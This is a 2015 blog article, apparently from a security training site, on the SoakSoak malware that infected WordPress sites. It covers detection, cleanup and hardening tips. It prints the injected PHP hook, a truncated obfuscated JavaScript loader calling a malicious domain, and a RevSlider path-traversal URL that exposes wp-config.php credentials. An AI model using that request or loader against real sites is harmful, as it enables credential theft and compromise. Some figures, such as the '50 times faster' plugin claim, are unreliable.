Malware analysis

SoakSoak Malware and How to Protect Your WordPress Website

Pavitra Shankdhar
January 5, 2015 by
Pavitra Shankdhar

If you follow security news, I am sure you have heard of SoakSoak malware. It has been in the news for the past few days because it affects more than 100,000+ WordPress websites, and this number may increase. As I am also a WordPress user, I followed the news and came to know more about SoakSoak malware. WordPress and security forums have been flooded with malware infection related questions. People are asking questions about this malware in forums. And this is obvious because they care for their online business. In my previous article, I mentioned WPScanner, an online vulnerability scanner along with tips to secure your WordPress. If you are a WordPress user, I strongly recommend you read that article too.

In this detailed article, I will discuss SoakSoak malware, which gave sleepless night to many website owners. I will also try to show how this malware works and how it affects a website. Then I will also describe how to remove this malware from your website if your website was affected by SoakSoak malware. I will also add security tips again. And yes, I should repeat them, because I know many of you will not go to the previous article I mentioned above.

What is SoakSoak malware?

Basically, it seems to be a Russian malware, because it is soaksoak.ru that infects WordPress by modifying the core files of WordPress installations. Sucuri has published a report on this malware and found that it is related to the RevSlider vulnerability. This malware exploits the RevSlider vulnerability to upload a backdoor on your WordPress. If you don't use RevSlider, it does not mean that you can sit down and relax, because a single website can infect all other websites hosted on the same server. If you are on a shared hosting platofrm, you are most likely to be a victim of this malware, because there are usually hundreds of websites hosted on the same server. And there is the possibility that any of those websites could get an infection.

This malware infects these two WordPress files:

  • wp-includes/js/swfobject.js
  • wp-includes/template-loader.php

This malware adds malicious codes in these two files. You can open these two files to check if any malicious code was injected there.

But on a few other websites, some other files were also found to be infected. It is not just limited to these two files.

If we discuss the basic infection, which is more common, it infects wp-includes/template-loader.php and injects a PHP code to include a .js file in the website.

[javascript]

function FuncQueueObject()

{

wp_enqueue_script("swfobject");

}

add_action("wp_enqueue_scripts", 'FuncQueueObject');

[/javascript]

If you know WordPress coding, you can easily understand what this code does. This code includes the swfobject.js file in all the pages of your website. As we already mentioned, swfobject.js is the other file which has the infection.

Sucuri identified the malicious .js code. This is the code which was found injected in the swfobject.js file of the infected WordPress website.

[javascript]

eval(decodeURIComponent

("%28%0D%0A%66%75%6E%63%74%69%6F%6E%28%29%0D%0A%7B%0D%..72%69%70%74%2E%69%64%3D%27%78%78%79%79%7A%7A%5F%70%65%74%75%73%68%6F%6B%27%3B%0D%0A%09%68%65%61%64%2E%61%70%70%65%6E%64%43%68%69%6C%64%28%73%63%72%69%70%74%29%3B%0D%0A%7D%28%29%0D%0A%29%3B"));

[/javascript]

If you decode this, you will find that this malicious code loads content from the SoakSoak.ru domain. This is why this malware is called SoakSoak malware. This malware then started infecting other websites found on the same server.

Stopbadware also reported that a collect.js script was also found on many affected websites. However, it was loading from a few IP addresses and not from SoakSoak.ru, but some claimed that it is related to SoakSoak malware. These IP addresses also change periodically. But we can't confirm if this was related to SoakSoak malware, because there is no strong proof that collect.js is related. There is a possibility that it is something else, and those website were affected by two different malwares.

Sucuri also decompiled the swfobjct.swf and found that it executed some obfuscated JavaScript only in IE11 and Firefox browsers. This code loads an invisible iframe from milaprostaya.ru/images/.

This milaprostaya.ru is another website which was infected by SoakSoak malware. This confirms that this malware is also using the hacked websites to infect other websites. So, hackers have thousands of websites to host their payloads and can now use it to hack more websites. If your website was also hacked, there is the possibility that hackers are now using this as a source of infection to hack other websites.

How to check if your website is vulnerable

If you are a WordPress user and use shared hosting, then you should now check your website, because there is the possibility that your website has also been hacked, even if you are not using the vulnerable plugin or have all your themes and plugins updated. If your website is vulnerable, you may start seeing a warning on Chrome while attempting to open your own website, or you may receive a notification in Google's webmaster tools account. But it takes a few days to identify malware on your website by Google. So, there are few ways if you want to instantly check if your website is vulnerable.

Just open this URL in your browser by adding your website's URL at the beginning:

www.yourblog.com/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php

If your website is vulnerable, it will show you the configuration file containing sensitive information about your website, including db username, password, salt and other things. Basically, it will show your wp-config.php file. But if your website is not vulnerable, you will see 0 or nothing in the browser.

You can also check the listed WordPress file template-loader.php for the malicious code. I wrote the malicious code above. But the infection may also be on some other files, so this option may not be effective. If you are not sure, install security plugins which will automatically scan and tell you about the infection. I will discuss effective WordPress security plugins in the next section. These plugins quickly find and report the malicious activity in WordPress based websites.

How to clean your website and remove SoakSoak malware

The best way to remove SoakSoak malware is to replace the infected WordPress files with the fresh clean original WordPress files. But I also recommend to check the .js files of your themes and other core files to see if these files are clean. There are hundreds of files in the WordPress core. So, the best way is to update all files. For this, login to your WordPress admin panel and click on the Dashboard option at the left menu. Here, click on Updates. In the WordPress Updates section, you will see the WordPress version you are using along with the list of plugins and themes that have pending updates. Here, you will see a button, "Re-install Now", near the WordPress Version mentioned. This will re-install the recently pushed WordPress and will update all your files.

Figure: WordPress Update page

Then use the same window to select all the pending plugins to update and pending themes to update. You can see both options at the same page. As I mentioned many times, you should always take care of updates.

You can also install any of the popular WordPress security plugins to scan your blog and find malicious scripts. Wordfence Security is the freely available security plugin for WordPress which offers good security. Wordfence starts checking your website for known infections. It also checks the core files of WordPress and compares it with original WordPress files to find any infections. It makes your website secure and 50 times faster. It is also connected with a vulnerability database to detect the known malware. So, it can quickly find if there is any infection in the theme or plugin's file. Once you know about the infection, you can remove it from the website. This plugin is free and performs very well.

There are a few other security plugins which we will be reviewing in upcoming posts.

Once you are done with cleanup, there is another important thing which you should do if Google has listed your website as malware. You should request Google to remove that notification. If Google lists your website as malware affected, Google Chrome will show your website as suspicious with warning message. It will also lower your search engine ranking. So, you should tell Google that you have fixed the malware problem. For this, you should use Google Webmaster tools. In Google Webmaster tools, select your website and navigate to security issues menu at the left side of the page. Here, click "Request a review." Google system will scan your website for malware or unwanted software. If nothing is found, Google will remove the warning from your website. This may take few days, so have patience. You can also check status of your request in the security issue section of Webmaster tools.

How to avoid malwares in a WordPress website

WordPress is the most popular content management system, and 6 out of 10 websites are running on WordPress. This is the reason it is the main target of the hackers. If you are using WordPress, I recommend you to be extra careful. You should follow the security guidelines listed below:

  • Install a good antivirus in your system and keep it updated. Most of the time, malware infects a website from the systems. As a website owner, you will often download and upload files to the server. If your system is infected, it may affect your hosting too.
  • Signup for a good web hosting company. Good web hosting companies do proper security upgrades of their servers. So, you can trust them. Cheap web hosting companies are budget friendly, but they can be a big risk. If you are using an unmanaged server, then security is on your hands. Keep your server secure as much as you can.
  • Keep your WordPress version, themes, plugins and server upgraded. Most of the people who become the victims of these malware are those who generally forget to update plugins or themes. And hackers generally target these websites. If you are using an outdated plugin, theme or WordPress version, you are putting your website at a big risk. In every new update, WordPress pushes security fixes. So, always keep an eye on updates.
  • Always download plugins or themes only from WordPress.og or trusted sources. Downloading a nulled theme is not recommended. Most of the nulled themes and plugins come with encrypted codes which open backdoors. These may also contain malware. So, it is better to go for official themes and plugins.
  • Use "Limit invalid login" in your WordPress. This will protect your WordPress login against bruteforcing attacks. Most WordPress websites are hacked by bruteforcing the login. And one more thing, never use default admin username. Username "admin" is common and easy to guess. It makes bruteforcing easier, because they only have to guess the password. 50% of the work has already been done.
  • Use a web application firewall. There are many companies which offer good web application firewalls. If it suits your budget, you can purchase one. If you are geeky enough, you can manage these things by yourself. In InfoSec Institute's online resources section, we have posted various good articles to increase your knowledge on web application security. You should surely visit this blog regularly to know more about web application security.

Conclusion

This is not the first time a malware has infected this many WordPress websites. Still, there are so many users who usually ignore security measures. If you are also one of them, it is the time to start thinking about the security of the website. In this article, we have discussed how this malware infects the website. So, you now know that old plugins and themes are the main reason behind the success of these malware. Never give any chance to hackers, and start protecting your websites. If you can't do much, at least install security plugins which will automatically scan your website and warn you if there is anything suspicious. But by following security practices, you will never be in trouble.

If you have any questions regarding SoakSoak malware, you can ask via comments. If you are a WordPress user, you can also ask if you are not able to fix the issue in your website.

Resources

http://codex.wordpress.org/FAQ_My_site_was_hacked

http://blog.sucuri.net/2014/12/soaksoak-payload-analysis-evolution-of-compromised-sites-ie-11.html

https://www.stopbadware.org/blog/2014/12/24/soaksoak-malware-infection-hallmarks-and-removal-resources

Pavitra Shankdhar
Pavitra Shankdhar

Pavitra Shandkhdhar is an engineering graduate and a security researcher. His area of interest is web penetration testing. He likes to find vulnerabilities in websites and playing computer games in his free time. He is currently a researcher with InfoSec Institute.